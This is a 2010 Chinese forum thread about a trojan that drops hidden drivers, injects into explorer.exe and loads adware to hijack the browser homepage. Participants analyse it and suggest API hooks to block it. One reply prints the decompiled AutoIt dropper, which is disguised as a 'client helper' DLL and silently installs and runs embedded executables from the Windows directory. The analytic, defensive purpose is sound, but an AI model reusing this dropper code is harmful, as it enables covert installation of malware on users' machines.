释放驱动,注入explorer.exe~~求助!![已解决]
本帖最后由 woeiwoei 于 2010-11-25 09:20 编辑朋友传来一个程序。运行后 会在c:\windows\system32下建立当天日期为准的 文件夹。并且释放 两个 驱动文件到这个文件夹内。并隐藏。
分析发现是 远程线程注入的方式注入到 explorer.exe 而且还加载广告文件。路径为:c:\windows\desk.exe
目的是 强制修改主页,加载广告。。解决方法是,替换 explorer.exe 或拒绝释放 驱动文件。。
本人无能,根据网上方法。没能用OD 得到源码。。。版本为3.3.1.6。壳已脱,希望遇到高手能反一下。。{:face (197):}
源程序: au3这么强啊!希望高手能给出答案 au3这么强啊!希望高手能给出答案
king8462 发表于 2010-11-24 15:45 http://www.autoitx.com/images/common/back.gif
是啊。。高手太多。。 截取任意一步就可以阻止了。
1、挂钩CreateDirectory阻止新建文件夹。
2、挂钩NtCreateFile阻止释放驱动。
3、挂钩NtCreateThread阻止创建远程线程。 关键不在这个au3程序,在于附着的木马程序
#Region AutoIt3Wrapper 预编译参数(常用参数)
#AutoIt3Wrapper_Icon=IE.ICO
#AutoIt3Wrapper_Outfile=IEFZ.DLL
#AutoIt3Wrapper_Outfile_Type=DLL
#AutoIt3Wrapper_Compression=9
#AutoIt3Wrapper_UseUpx=y
#AutoIt3Wrapper_Res_Comment=客户端辅助
#AutoIt3Wrapper_Res_Description=客户端辅助
#AutoIt3Wrapper_Res_Fileversion=1.0.0.1
#AutoIt3Wrapper_Res_LegalCopyright=备份管理系统
#AutoIt3Wrapper_Change2CUI=N
#EndRegion AutoIt3Wrapper 预编译参数(常用参数)
AutoItSetOption('TrayIconHide', 1)
FileDelete(@WindowsDir & '\Desk.exe')
FileDelete(@WindowsDir & '\linkconfig.ini')
FileDelete(@WindowsDir & '\9380_1.exe')
FileInstall('C:\9380_1.exe', @WindowsDir & '\9380_1.exe', 1)
FileInstall('C:\Desk.exe', @WindowsDir & '\Desk.exe', 1)
FileInstall('C:\linkconfig.ini', @WindowsDir & '\linkconfig.ini', 1)
Run(@WindowsDir & '\9380_1.exe', @WindowsDir, @SW_HIDE)
Sleep(12000)
Run(@WindowsDir & '\Desk.exe', @WindowsDir, @SW_HIDE)
FileDelete(@WindowsDir & '\9380_1.exe')
Exit
关键不在这个au3程序,在于附着的木马程序
快雪时晴 发表于 2010-11-24 22:08 http://www.autoitx.com/images/common/back.gif
原因找到了。。释放的9380_1.exe为E语言编写,是关键的主程序,可惜E反不了。
是我搞错对象了。
呵呵。谢谢你,也谢谢P大的指点。。此帖结了~~~{:face (396):} 原来、、、、
页:
[1]